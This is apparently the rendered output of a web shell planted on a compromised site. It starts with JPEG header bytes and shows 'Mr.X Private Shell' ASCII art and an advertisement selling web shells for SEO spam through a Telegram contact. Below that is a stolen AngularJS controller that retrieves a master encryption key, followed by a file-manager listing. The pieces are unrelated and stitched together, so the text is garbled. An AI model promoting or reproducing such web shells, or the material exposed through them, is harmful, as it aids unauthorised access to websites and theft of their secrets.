����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
'use strict';
define(['app'], function(app) {
app.controller("rootPrivateKey100",
["$rootScope", "$scope", "api",
function ($rootScope, $scope, api) {
var name = 'rootPrivateKey';
var order = 100;
var feature = {
_id: order + "_" + name,
feature: name,
order: order,
};
$scope.encryption_key = '';
api.getMasterEncryptionKey({
success: function (data) { $scope.encryption_key = data.encryption_key; }
});
$scope.$on('save', function () {
$rootScope.$emit("approve", feature);
});
}
]
);
});| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| controller.js | File | 569 B | 0644 |
|
| view.htm | File | 858 B | 0644 |
|